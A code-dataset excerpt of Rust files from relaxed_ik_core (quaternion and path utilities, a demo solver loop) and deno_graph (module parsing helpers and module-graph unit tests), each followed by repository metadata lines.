/// Builds a unit quaternion from an angle and a (not necessarily unit) axis.
pub fn quaternion_from_angleaxis(angle: f64, axis: Vector3<f64>) -> UnitQuaternion<f64> {
// NOTE(review): the angle is doubled before being fed to quaternion_exp —
// confirm this matches that function's angle convention.
let a = angle * 2.0;
let axis_len = axis.norm();
// NOTE(review): divides by the axis norm with no zero check; a zero-length
// axis yields NaNs here — confirm callers never pass a zero axis.
quaternion_exp( axis * (a / axis_len))
}
| rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/utils_rust/file_utils.rs | src/utils_rust/file_utils.rs | use std::env;
use std::fs::File;
use std::io::prelude::*;
use std::fs::read_dir;
use path_slash::PathBufExt;
pub fn get_path_to_src() -> String {
let path = env::current_dir().unwrap();
let s = path.to_slash().unwrap();
let s1 = String::from(s);
let path_to_src = s1 + "/";
path_to_src
} | rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/utils_rust/mod.rs | src/utils_rust/mod.rs | pub mod transformations;
pub mod file_utils; | rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/bin/relaxed_ik_bin.rs | src/bin/relaxed_ik_bin.rs | extern crate relaxed_ik_lib;
use relaxed_ik_lib::relaxed_ik;
use nalgebra::{Vector3, UnitQuaternion, Quaternion};
use std::{io, thread, time};
use crate::relaxed_ik_lib::utils_rust::file_utils::{*};
/// Demo driver: loads the default RelaxedIK settings, then repeatedly nudges
/// every chain's goal position along +y and prints the joint solution.
fn main() {
    // Initialize RelaxedIK from the default settings file.
    let path_to_src = get_path_to_src();
    let default_path_to_setting = path_to_src + "configs/settings.yaml";
    let mut relaxed_ik = relaxed_ik::RelaxedIK::load_settings(default_path_to_setting.as_str());
    // Run 10 solve iterations; the index itself is unused, so bind `_`
    // to avoid an unused-variable warning.
    for _ in 0..10 {
        for j in 0..relaxed_ik.vars.robot.num_chains {
            // gradually move along the y axis
            relaxed_ik.vars.goal_positions[j] += Vector3::new(0.0, 0.01, 0.0);
        }
        let x = relaxed_ik.solve();
        println!("Joint solutions: {:?}", x);
    }
}
| rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/lib.rs | src/lib.rs | // Copyright 2018-2024 the Deno authors. MIT license.
#![deny(clippy::print_stderr)]
#![deny(clippy::print_stdout)]
#![deny(clippy::unused_async)]
#![deny(clippy::unnecessary_wraps)]
pub mod analysis;
#[cfg(feature = "swc")]
pub mod ast;
mod collections;
mod graph;
mod jsr;
mod module_specifier;
mod rt;
#[cfg(feature = "symbols")]
pub mod symbols;
#[cfg(feature = "fast_check")]
pub mod fast_check;
pub mod packages;
pub mod source;
use source::FileSystem;
use source::JsrUrlProvider;
use source::Resolver;
use std::collections::HashMap;
use std::sync::Arc;
use std::time::SystemTime;
pub use deno_media_type::MediaType;
#[cfg(feature = "fast_check")]
pub use graph::BuildFastCheckTypeGraphOptions;
pub use graph::BuildOptions;
pub use graph::CheckJsOption;
pub use graph::CheckJsResolver;
pub use graph::Dependency;
pub use graph::ExternalModule;
#[cfg(feature = "fast_check")]
pub use graph::FastCheckTypeModule;
#[cfg(feature = "fast_check")]
pub use graph::FastCheckTypeModuleSlot;
pub use graph::FillFromLockfileOptions;
pub use graph::GraphImport;
pub use graph::GraphKind;
pub use graph::Import;
pub use graph::ImportKind;
pub use graph::JsModule;
pub use graph::JsonModule;
pub use graph::JsrLoadError;
pub use graph::JsrPackageReqNotFoundError;
pub use graph::Module;
pub use graph::ModuleEntryRef;
pub use graph::ModuleError;
pub use graph::ModuleErrorKind;
pub use graph::ModuleGraph;
pub use graph::ModuleGraphError;
pub use graph::ModuleLoadError;
pub use graph::ModuleTextSource;
pub use graph::NpmLoadError;
pub use graph::NpmModule;
pub use graph::Position;
pub use graph::PositionRange;
pub use graph::Range;
pub use graph::Resolution;
pub use graph::ResolutionError;
pub use graph::ResolutionResolved;
pub use graph::TypesDependency;
pub use graph::WalkOptions;
pub use graph::WasmModule;
#[cfg(feature = "fast_check")]
pub use graph::WorkspaceFastCheckOption;
pub use graph::WorkspaceMember;
pub use jsr::JsrMetadataStore;
pub use module_specifier::ModuleSpecifier;
pub use module_specifier::SpecifierError;
pub use module_specifier::resolve_import;
pub use rt::Executor;
pub use source::NpmResolvePkgReqsResult;
use self::analysis::ModuleAnalyzer;
/// Additional import that should be brought into the scope of
/// the module graph to add to the graph's "imports". This may
/// be extra modules such as TypeScript's "types" option or JSX
/// runtime types.
#[derive(Debug, Clone)]
pub struct ReferrerImports {
/// The referrer to resolve the imports from.
pub referrer: ModuleSpecifier,
/// Specifiers relative to the referrer to resolve.
pub imports: Vec<String>,
}
/// Options for [`parse_module`].
pub struct ParseModuleOptions<'a> {
/// Kind of graph being built.
pub graph_kind: GraphKind,
/// Specifier of the module being parsed.
pub specifier: ModuleSpecifier,
/// Headers associated with the module, if any.
pub maybe_headers: Option<HashMap<String, String>>,
/// Modification time of the underlying file, if known.
pub mtime: Option<SystemTime>,
/// Raw bytes of the module source.
pub content: Arc<[u8]>,
/// File system used while building the module.
pub file_system: &'a FileSystem,
/// Provider of the JSR base URL.
pub jsr_url_provider: &'a dyn JsrUrlProvider,
/// Optional custom resolver for import specifiers.
pub maybe_resolver: Option<&'a dyn Resolver>,
/// Analyzer used to extract dependency information from the source.
pub module_analyzer: &'a dyn ModuleAnalyzer,
}
/// Parse an individual module, returning the module as a result, otherwise
/// erroring with a module graph error.
#[allow(clippy::result_large_err)]
pub async fn parse_module(
  options: ParseModuleOptions<'_>,
) -> Result<Module, ModuleError> {
  // First analyze the raw source (treated as a non-dynamic root module with
  // no referrer or attribute type)...
  let source_and_info = graph::parse_module_source_and_info(
    options.module_analyzer,
    graph::ParseModuleAndSourceInfoOptions {
      specifier: options.specifier,
      maybe_headers: options.maybe_headers,
      mtime: options.mtime,
      content: options.content,
      maybe_attribute_type: None,
      maybe_referrer: None,
      maybe_source_phase_referrer: None,
      is_root: true,
      is_dynamic_branch: false,
    },
  )
  .await?;
  // ...then turn the analyzed source into a graph module.
  Ok(graph::parse_module(
    options.file_system,
    options.jsr_url_provider,
    options.maybe_resolver,
    graph::ParseModuleOptions {
      graph_kind: options.graph_kind,
      module_source_and_info: source_and_info,
    },
  ))
}
/// Options for [`parse_module_from_ast`].
#[cfg(feature = "swc")]
pub struct ParseModuleFromAstOptions<'a> {
/// Kind of graph being built.
pub graph_kind: GraphKind,
/// Specifier of the module being parsed.
pub specifier: ModuleSpecifier,
/// Headers associated with the module, if any.
pub maybe_headers: Option<&'a HashMap<String, String>>,
/// Modification time of the underlying file, if known.
pub mtime: Option<SystemTime>,
/// Already-parsed source (AST) for the module.
pub parsed_source: &'a deno_ast::ParsedSource,
/// File system used while building the module.
pub file_system: &'a FileSystem,
/// Provider of the JSR base URL.
pub jsr_url_provider: &'a dyn JsrUrlProvider,
/// Optional custom resolver for import specifiers.
pub maybe_resolver: Option<&'a dyn Resolver>,
}
/// Parse an individual module from an AST, returning the module.
#[cfg(feature = "swc")]
pub fn parse_module_from_ast(options: ParseModuleFromAstOptions) -> JsModule {
  // Extract everything we need from the parsed source up front.
  let media_type = options.parsed_source.media_type();
  let module_info = ast::ParserModuleAnalyzer::module_info(options.parsed_source);
  let text_source =
    ModuleTextSource::new_unknown(options.parsed_source.text().clone());
  graph::parse_js_module_from_module_info(
    options.graph_kind,
    options.specifier,
    media_type,
    options.maybe_headers,
    module_info,
    options.mtime,
    text_source,
    options.file_system,
    options.jsr_url_provider,
    options.maybe_resolver,
  )
}
#[cfg(test)]
mod tests {
use crate::graph::Import;
use crate::graph::ImportKind;
use crate::graph::PositionRange;
use crate::graph::ResolutionResolved;
use crate::source::NullFileSystem;
use crate::source::ResolutionKind;
use self::graph::CheckJsOption;
use super::*;
use deno_error::JsErrorBox;
use deno_semver::package::PackageNv;
use deno_semver::package::PackageReq;
use indexmap::IndexMap;
use indexmap::IndexSet;
use parking_lot::Mutex;
use pretty_assertions::assert_eq;
use serde_json::json;
use source::CacheInfo;
use source::DEFAULT_JSX_IMPORT_SOURCE_MODULE;
use source::MemoryLoader;
use source::ResolutionMode;
use source::Source;
use source::tests::MockResolver;
use std::collections::BTreeMap;
type Sources<'a> = Vec<(&'a str, Source<&'a str, &'a str>)>;
/// Builds a `MemoryLoader` test fixture from the given sources and cache
/// info entries.
fn setup(
sources: Sources,
cache_info: Vec<(&str, CacheInfo)>,
) -> MemoryLoader {
MemoryLoader::new(sources, cache_info)
}
#[tokio::test]
async fn test_build_graph() {
let loader = setup(
vec![
(
"file:///a/test01.ts",
Source::Module {
specifier: "file:///a/test01.ts",
maybe_headers: None,
content: r#"import * as b from "./test02.ts";"#,
},
),
(
"file:///a/test02.ts",
Source::Module {
specifier: "file:///a/test02.ts",
maybe_headers: None,
content: r#"export const b = "b";"#,
},
),
],
vec![],
);
let root_specifier =
ModuleSpecifier::parse("file:///a/test01.ts").expect("bad url");
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![root_specifier.clone()],
Default::default(),
&loader,
Default::default(),
)
.await;
assert_eq!(graph.module_slots.len(), 2);
assert_eq!(graph.roots, IndexSet::from([root_specifier.clone()]));
assert!(graph.contains(&root_specifier));
assert!(
!graph.contains(&ModuleSpecifier::parse("file:///a/test03.ts").unwrap())
);
let module = graph
.module_slots
.get(&root_specifier)
.unwrap()
.module()
.unwrap()
.js()
.unwrap();
assert_eq!(module.dependencies.len(), 1);
let maybe_dependency = module.dependencies.get("./test02.ts");
assert!(maybe_dependency.is_some());
let dependency_specifier =
ModuleSpecifier::parse("file:///a/test02.ts").unwrap();
let dependency = maybe_dependency.unwrap();
assert!(!dependency.is_dynamic);
assert_eq!(
dependency.maybe_code.ok().unwrap().specifier,
dependency_specifier
);
assert_eq!(dependency.maybe_type, Resolution::None);
let maybe_dep_module_slot = graph.get(&dependency_specifier);
assert!(maybe_dep_module_slot.is_some());
}
#[tokio::test]
async fn test_build_graph_multiple_roots() {
let loader = setup(
vec![
(
"file:///a/test01.ts",
Source::Module {
specifier: "file:///a/test01.ts",
maybe_headers: None,
content: r#"import * as b from "./test02.ts";"#,
},
),
(
"file:///a/test02.ts",
Source::Module {
specifier: "file:///a/test02.ts",
maybe_headers: None,
content: r#"export const b = "b";"#,
},
),
(
"https://example.com/a.ts",
Source::Module {
specifier: "https://example.com/a.ts",
maybe_headers: None,
content: r#"import * as c from "./c.ts";"#,
},
),
(
"https://example.com/c.ts",
Source::Module {
specifier: "https://example.com/c.ts",
maybe_headers: None,
content: r#"export const c = "c";"#,
},
),
],
vec![],
);
let roots = IndexSet::from([
ModuleSpecifier::parse("file:///a/test01.ts").unwrap(),
ModuleSpecifier::parse("https://example.com/a.ts").unwrap(),
]);
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
roots.iter().cloned().collect(),
Vec::new(),
&loader,
Default::default(),
)
.await;
assert_eq!(graph.module_slots.len(), 4);
assert_eq!(graph.roots, roots);
assert!(
graph.contains(&ModuleSpecifier::parse("file:///a/test01.ts").unwrap())
);
assert!(
graph.contains(&ModuleSpecifier::parse("file:///a/test02.ts").unwrap())
);
assert!(
graph
.contains(&ModuleSpecifier::parse("https://example.com/a.ts").unwrap())
);
assert!(
graph
.contains(&ModuleSpecifier::parse("https://example.com/c.ts").unwrap())
);
}
#[tokio::test]
async fn test_build_graph_multiple_times() {
let loader = setup(
vec![
(
"file:///a/test01.ts",
Source::Module {
specifier: "file:///a/test01.ts",
maybe_headers: None,
content: r#"import * as b from "./test02.ts";"#,
},
),
(
"file:///a/test02.ts",
Source::Module {
specifier: "file:///a/test02.ts",
maybe_headers: None,
content: r#"import "https://example.com/c.ts"; export const b = "b";"#,
},
),
(
"https://example.com/a.ts",
Source::Module {
specifier: "https://example.com/a.ts",
maybe_headers: None,
content: r#"import * as c from "./c.ts";"#,
},
),
(
"https://example.com/c.ts",
Source::Module {
specifier: "https://example.com/c.ts",
maybe_headers: None,
content: r#"import "./d.ts"; export const c = "c";"#,
},
),
(
"https://example.com/d.ts",
Source::Module {
specifier: "https://example.com/d.ts",
maybe_headers: None,
content: r#"export const d = "d";"#,
},
),
],
vec![],
);
let first_root = ModuleSpecifier::parse("file:///a/test01.ts").unwrap();
let second_root =
ModuleSpecifier::parse("https://example.com/a.ts").unwrap();
let third_root =
ModuleSpecifier::parse("https://example.com/d.ts").unwrap();
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![first_root.clone()],
Default::default(),
&loader,
Default::default(),
)
.await;
assert_eq!(graph.module_slots.len(), 4);
assert_eq!(graph.roots, IndexSet::from([first_root.clone()]));
// now build with the second root
graph
.build(
vec![second_root.clone()],
Default::default(),
&loader,
Default::default(),
)
.await;
let mut roots = IndexSet::from([first_root, second_root]);
assert_eq!(graph.module_slots.len(), 5);
assert_eq!(graph.roots, roots);
assert!(
graph.contains(&ModuleSpecifier::parse("file:///a/test01.ts").unwrap())
);
assert!(
graph.contains(&ModuleSpecifier::parse("file:///a/test02.ts").unwrap())
);
assert!(
graph
.contains(&ModuleSpecifier::parse("https://example.com/a.ts").unwrap())
);
assert!(
graph
.contains(&ModuleSpecifier::parse("https://example.com/c.ts").unwrap())
);
assert!(
graph
.contains(&ModuleSpecifier::parse("https://example.com/d.ts").unwrap())
);
// now try making one of the already existing modules a root
graph
.build(
vec![third_root.clone()],
Default::default(),
&loader,
Default::default(),
)
.await;
roots.insert(third_root);
assert_eq!(graph.module_slots.len(), 5);
assert_eq!(graph.roots, roots);
}
#[tokio::test]
async fn test_build_graph_json_module_root() {
let loader = setup(
vec![(
"file:///a/test.json",
Source::Module {
specifier: "file:///a/test.json",
maybe_headers: None,
content: r#"{"a": 1, "b": "c"}"#,
},
)],
vec![],
);
let roots = vec![ModuleSpecifier::parse("file:///a/test.json").unwrap()];
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
roots.clone(),
Default::default(),
&loader,
BuildOptions {
is_dynamic: true,
..Default::default()
},
)
.await;
assert_eq!(
json!(graph),
json!({
"roots": [
"file:///a/test.json"
],
"modules": [
{
"size": 18,
"kind": "asserted",
"mediaType": "Json",
"specifier": "file:///a/test.json"
}
],
"redirects": {}
})
);
}
#[tokio::test]
async fn test_valid_type_missing() {
let loader = setup(
vec![
(
"file:///a/test01.ts",
Source::Module {
specifier: "file:///a/test01.ts",
maybe_headers: None,
content: r#"// @deno-types=./test02.d.ts
import * as a from "./test02.js";
console.log(a);
"#,
},
),
(
"file:///a/test02.js",
Source::Module {
specifier: "file:///a/test02.js",
maybe_headers: None,
content: r#"export const b = "b";"#,
},
),
],
vec![],
);
let root_specifier =
ModuleSpecifier::parse("file:///a/test01.ts").expect("bad url");
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![root_specifier.clone()],
Default::default(),
&loader,
Default::default(),
)
.await;
assert!(graph.valid().is_ok());
}
// A root module importing a code file that does not exist must make the
// graph invalid with a "module not found" error.
#[tokio::test]
async fn test_valid_code_missing() {
let loader = setup(
vec![(
"file:///a/test01.ts",
Source::Module {
specifier: "file:///a/test01.ts",
maybe_headers: None,
content: r#"import * as a from "./test02.js";
console.log(a);
"#,
},
)],
vec![],
);
let root_specifier = ModuleSpecifier::parse("file:///a/test01.ts").unwrap();
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![root_specifier.clone()],
Default::default(),
&loader,
Default::default(),
)
.await;
// The missing "./test02.js" dependency surfaces via graph.valid().
assert!(graph.valid().is_err());
assert_eq!(
graph.valid().err().unwrap().to_string(),
"Module not found \"file:///a/test02.js\"."
);
}
// A remote (https) module is allowed to import a data: URL module; the
// resulting graph must be valid.
#[tokio::test]
async fn test_remote_import_data_url() {
let loader = setup(
vec![(
"https://deno.land/main.ts",
Source::Module {
specifier: "https://deno.land/main.ts",
maybe_headers: None,
content: r#"import * as a from "data:application/typescript;base64,ZXhwb3J0IGNvbnN0IGEgPSAiYSI7CgpleHBvcnQgZW51bSBBIHsKICBBLAogIEIsCiAgQywKfQo=";
console.log(a);
"#,
},
)],
vec![],
);
let root_specifier =
ModuleSpecifier::parse("https://deno.land/main.ts").unwrap();
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![root_specifier.clone()],
Default::default(),
&loader,
Default::default(),
)
.await;
assert!(graph.valid().is_ok());
}
#[tokio::test]
async fn test_remote_import_local_url() {
for scheme in &["http", "https"] {
let root_specifier =
ModuleSpecifier::parse(&format!("{scheme}://deno.land/main.ts"))
.unwrap();
let loader = setup(
vec![
(
root_specifier.as_str(),
Source::Module {
specifier: root_specifier.as_str(),
maybe_headers: None,
content: r#"import * as a from "file:///local.ts";
console.log(a);
"#,
},
),
(
"file:///local.ts",
Source::Module {
specifier: "file:///local.ts",
maybe_headers: None,
content: r#"console.log(1);"#,
},
),
],
vec![],
);
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![root_specifier],
Default::default(),
&loader,
Default::default(),
)
.await;
assert!(matches!(
graph.valid().err().unwrap(),
ModuleGraphError::ResolutionError(
ResolutionError::InvalidLocalImport { .. },
)
));
}
}
#[tokio::test]
async fn test_remote_import_local_url_remapped() {
for scheme in &["http", "https"] {
let root_specifier_str = format!("{scheme}://deno.land/main.ts");
let root_specifier = ModuleSpecifier::parse(&root_specifier_str).unwrap();
let loader = setup(
vec![
(
root_specifier.as_str(),
Source::Module {
specifier: root_specifier.as_str(),
maybe_headers: None,
content: r#"import * as a from "remapped";
console.log(a);
"#,
},
),
(
"file:///local.ts",
Source::Module {
specifier: "file:///local.ts",
maybe_headers: None,
content: r#"console.log(1);"#,
},
),
],
vec![],
);
let resolver = MockResolver::new(
vec![(
root_specifier_str.as_str(),
vec![("remapped", "file:///local.ts")],
)],
vec![],
);
let maybe_resolver: Option<&dyn Resolver> = Some(&resolver);
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![root_specifier.clone()],
Default::default(),
&loader,
BuildOptions {
resolver: maybe_resolver,
..Default::default()
},
)
.await;
assert!(graph.valid().is_ok());
}
}
#[tokio::test]
async fn test_build_graph_imports() {
let loader = setup(
vec![
(
"file:///a/test01.ts",
Source::Module {
specifier: "file:///a/test01.ts",
maybe_headers: None,
content: r#"console.log("a");"#,
},
),
(
"file:///a/types.d.ts",
Source::Module {
specifier: "file:///a/types.d.ts",
maybe_headers: None,
content: r#"export type { A } from "./types_01.d.ts";"#,
},
),
(
"file:///a/types_01.d.ts",
Source::Module {
specifier: "file:///a/types_01.d.ts",
maybe_headers: None,
content: r#"export class A {};"#,
},
),
],
vec![],
);
let root_specifier = ModuleSpecifier::parse("file:///a/test01.ts").unwrap();
let config_specifier =
ModuleSpecifier::parse("file:///a/tsconfig.json").unwrap();
let imports = vec![ReferrerImports {
referrer: config_specifier,
imports: vec!["./types.d.ts".to_string()],
}];
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![root_specifier],
imports,
&loader,
BuildOptions::default(),
)
.await;
assert_eq!(
json!(graph),
json!({
"roots": ["file:///a/test01.ts"],
"modules": [
{
"kind": "esm",
"mediaType": "TypeScript",
"size": 17,
"specifier": "file:///a/test01.ts"
},
{
"dependencies": [
{
"specifier": "./types_01.d.ts",
"type": {
"specifier": "file:///a/types_01.d.ts",
"span": {
"start": {
"line":0,
"character":23
},
"end": {
"line":0,
"character":40
}
}
}
}
],
"kind": "esm",
"mediaType": "Dts",
"size": 41,
"specifier": "file:///a/types.d.ts"
},
{
"kind": "esm",
"mediaType": "Dts",
"size": 18,
"specifier": "file:///a/types_01.d.ts"
}
],
"imports": [
{
"referrer": "file:///a/tsconfig.json",
"dependencies": [
{
"specifier": "./types.d.ts",
"type": {
"specifier": "file:///a/types.d.ts",
"span": {
"start": {
"line": 0,
"character": 0
},
"end": {
"line": 0,
"character": 0
}
}
}
}
]
},
],
"redirects":{},
})
);
}
#[tokio::test]
async fn test_build_graph_imports_imported() {
let loader = setup(
vec![
(
"file:///a/test01.ts",
Source::Module {
specifier: "file:///a/test01.ts",
maybe_headers: None,
content: r#"import config from "./deno.json" assert { type: "json" };
console.log(config);"#,
},
),
(
"file:///a/deno.json",
Source::Module {
specifier: "file:///a/deno.json",
maybe_headers: None,
content: r#"{
"compilerOptions": {
"jsxImportSource": "https://esm.sh/preact"
}
}"#,
},
),
(
"https://esm.sh/preact/runtime-jsx",
Source::Module {
specifier: "https://esm.sh/preact/runtime-jsx",
maybe_headers: Some(vec![(
"content-type",
"application/javascript",
)]),
content: r#"export function jsx() {}"#,
},
),
],
vec![],
);
let root_specifier = ModuleSpecifier::parse("file:///a/test01.ts").unwrap();
let config_specifier =
ModuleSpecifier::parse("file:///a/deno.json").unwrap();
let imports = vec![ReferrerImports {
referrer: config_specifier,
imports: vec!["https://esm.sh/preact/runtime-jsx".to_string()],
}];
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![root_specifier],
imports,
&loader,
BuildOptions::default(),
)
.await;
assert_eq!(
json!(graph),
json!({
"roots": ["file:///a/test01.ts"],
"modules": [
{
"kind": "asserted",
"size": 125,
"mediaType": "Json",
"specifier": "file:///a/deno.json",
},
{
"dependencies": [
{
"specifier": "./deno.json",
"code": {
"specifier": "file:///a/deno.json",
"resolutionMode": "import",
"span": {
"start": {
"line": 0,
"character": 19,
},
"end": {
"line": 0,
"character": 32,
}
}
},
"assertionType": "json"
}
],
"kind": "esm",
"size": 91,
"mediaType": "TypeScript",
"specifier": "file:///a/test01.ts",
},
{
"kind": "esm",
"size": 24,
"mediaType": "JavaScript",
"specifier": "https://esm.sh/preact/runtime-jsx",
},
],
"imports": [
{
"referrer": "file:///a/deno.json",
"dependencies": [
{
"specifier": "https://esm.sh/preact/runtime-jsx",
"type": {
"specifier": "https://esm.sh/preact/runtime-jsx",
"span": {
"start": {
"line": 0,
"character": 0,
},
"end": {
"line": 0,
"character": 0,
}
}
},
}
],
}
],
"redirects":{},
})
);
}
#[tokio::test]
async fn test_build_graph_imports_resolve_dependency() {
let loader = setup(
vec![
(
"file:///a/test01.ts",
Source::Module {
specifier: "file:///a/test01.ts",
maybe_headers: None,
content: r#"console.log("a");"#,
},
),
(
"https://example.com/jsx-runtime",
Source::Module {
specifier: "https://example.com/jsx-runtime",
maybe_headers: Some(vec![
("content-type", "application/javascript"),
("x-typescript-types", "./jsx-runtime.d.ts"),
]),
content: r#"export const a = "a";"#,
},
),
(
"https://example.com/jsx-runtime.d.ts",
Source::Module {
specifier: "https://example.com/jsx-runtime.d.ts",
maybe_headers: Some(vec![(
"content-type",
"application/typescript",
)]),
content: r#"export const a: "a";"#,
},
),
],
vec![],
);
let root_specifier = ModuleSpecifier::parse("file:///a/test01.ts").unwrap();
let config_specifier =
ModuleSpecifier::parse("file:///a/tsconfig.json").unwrap();
let imports = vec![ReferrerImports {
referrer: config_specifier.clone(),
imports: vec!["https://example.com/jsx-runtime".to_string()],
}];
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![root_specifier],
imports,
&loader,
BuildOptions::default(),
)
.await;
assert_eq!(
graph.resolve_dependency(
"https://example.com/jsx-runtime",
&config_specifier,
false
),
Some(ModuleSpecifier::parse("https://example.com/jsx-runtime").unwrap())
.as_ref()
);
assert_eq!(
graph.resolve_dependency(
"https://example.com/jsx-runtime",
&config_specifier,
true
),
Some(
ModuleSpecifier::parse("https://example.com/jsx-runtime.d.ts").unwrap()
)
.as_ref()
);
assert_eq!(
graph
.try_get(
&ModuleSpecifier::parse("https://example.com/jsx-runtime").unwrap()
)
.unwrap()
.unwrap()
.specifier()
.as_str(),
"https://example.com/jsx-runtime"
);
assert_eq!(
graph
.try_get_prefer_types(
&ModuleSpecifier::parse("https://example.com/jsx-runtime").unwrap()
)
.unwrap()
.unwrap()
.specifier()
.as_str(),
// should end up at the declaration file
"https://example.com/jsx-runtime.d.ts"
);
}
#[tokio::test]
async fn test_build_graph_with_headers() {
let loader = setup(
vec![(
"https://example.com/a",
Source::Module {
specifier: "https://example.com/a",
maybe_headers: Some(vec![(
"content-type",
"application/typescript; charset=utf-8",
)]),
content: r#"declare interface A { a: string; }"#,
},
)],
vec![],
);
let root_specifier =
ModuleSpecifier::parse("https://example.com/a").expect("bad url");
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![root_specifier.clone()],
Default::default(),
&loader,
Default::default(),
)
.await;
assert_eq!(graph.module_slots.len(), 1);
assert_eq!(graph.roots, IndexSet::from([root_specifier.clone()]));
let module = graph
.module_slots
.get(&root_specifier)
.unwrap()
.module()
.unwrap()
.js()
.unwrap();
assert_eq!(module.media_type, MediaType::TypeScript);
}
#[tokio::test]
async fn test_build_graph_jsx_import_source() {
let loader = setup(
vec![
(
"file:///a/test01.tsx",
Source::Module {
specifier: "file:///a/test01.tsx",
maybe_headers: None,
content: r#"/* @jsxImportSource https://example.com/preact */
export function A() {
<div>Hello Deno</div>
}
"#,
},
),
(
"https://example.com/preact/jsx-runtime",
Source::Module {
specifier: "https://example.com/preact/jsx-runtime/index.js",
maybe_headers: Some(vec![(
"content-type",
"application/javascript",
)]),
content: r#"export function jsx() {}"#,
},
),
],
vec![],
);
let root_specifier =
ModuleSpecifier::parse("file:///a/test01.tsx").expect("bad url");
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![root_specifier.clone()],
Default::default(),
&loader,
Default::default(),
)
.await;
assert_eq!(
json!(graph),
json!({
"roots": [
"file:///a/test01.tsx"
],
"modules": [
{
"dependencies": [
{
"specifier": "https://example.com/preact/jsx-runtime",
"code": {
"specifier": "https://example.com/preact/jsx-runtime",
"span": {
"start": {
"line": 0,
"character": 20
},
"end": {
"line": 0,
"character": 46
}
}
}
}
],
"kind": "esm",
"mediaType": "TSX",
"size": 147,
"specifier": "file:///a/test01.tsx"
},
{
"kind": "esm",
"mediaType": "JavaScript",
"size": 24,
"specifier": "https://example.com/preact/jsx-runtime/index.js"
}
],
"redirects": {
"https://example.com/preact/jsx-runtime": "https://example.com/preact/jsx-runtime/index.js"
}
})
);
}
#[tokio::test]
async fn test_build_graph_jsx_import_source_types() {
let loader = setup(
vec![
(
"file:///a/test01.tsx",
Source::Module {
specifier: "file:///a/test01.tsx",
maybe_headers: None,
content: r#"/* @jsxImportSource https://example.com/preact */
/* @jsxImportSourceTypes https://example.com/preact-types */
export function A() {
<div>Hello Deno</div>
}
"#,
},
),
(
"https://example.com/preact/jsx-runtime",
Source::Module {
specifier: "https://example.com/preact/jsx-runtime/index.js",
maybe_headers: Some(vec![(
"content-type",
"application/javascript",
)]),
content: r#"export function jsx() {}"#,
},
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | true |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/analysis.rs | src/analysis.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use std::collections::HashMap;
use std::sync::Arc;
use deno_error::JsErrorBox;
use deno_media_type::MediaType;
use once_cell::sync::Lazy;
use regex::Regex;
use serde::Deserialize;
use serde::Serialize;
use crate::ModuleSpecifier;
use crate::graph::Position;
use crate::graph::PositionRange;
use crate::source::ResolutionMode;
/// A dependency found in a module's source: either a static import/export
/// statement or a dynamic (expression-based) dependency.
#[derive(Clone, Debug, Eq, PartialEq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase", tag = "type")]
pub enum DependencyDescriptor {
/// A statically analyzable import/export statement.
Static(StaticDependencyDescriptor),
/// A dynamically evaluated dependency (e.g. `import()`/`require`).
Dynamic(DynamicDependencyDescriptor),
}
impl DependencyDescriptor {
pub fn as_static(&self) -> Option<&StaticDependencyDescriptor> {
match self {
Self::Static(descriptor) => Some(descriptor),
Self::Dynamic(_) => None,
}
}
pub fn as_dynamic(&self) -> Option<&DynamicDependencyDescriptor> {
match self {
Self::Static(_) => None,
Self::Dynamic(d) => Some(d),
}
}
pub fn import_attributes(&self) -> &ImportAttributes {
match self {
DependencyDescriptor::Static(d) => &d.import_attributes,
DependencyDescriptor::Dynamic(d) => &d.import_attributes,
}
}
}
#[derive(Clone, Debug, Eq, PartialEq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
#[serde(untagged)]
pub enum ImportAttribute {
/// The value of this attribute could not be statically analyzed.
Unknown,
/// The value of this attribute is a statically analyzed string.
Known(String),
}
#[derive(Clone, Default, Debug, Eq, PartialEq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub enum ImportAttributes {
/// There was no import attributes object literal.
#[default]
None,
/// The set of attribute keys could not be statically analyzed.
Unknown,
/// The set of attribute keys is statically analyzed, though each respective
/// value may or may not not be for dynamic imports.
Known(HashMap<String, ImportAttribute>),
}
impl ImportAttributes {
  /// True when no import attributes object literal was present.
  pub fn is_none(&self) -> bool {
    matches!(self, ImportAttributes::None)
  }

  /// Looks up the statically-known value for `key`. Returns `None` when the
  /// attribute set or that particular value could not be statically analyzed.
  pub fn get(&self, key: &str) -> Option<&str> {
    let ImportAttributes::Known(map) = self else {
      return None;
    };
    match map.get(key)? {
      ImportAttribute::Known(value) => Some(value.as_str()),
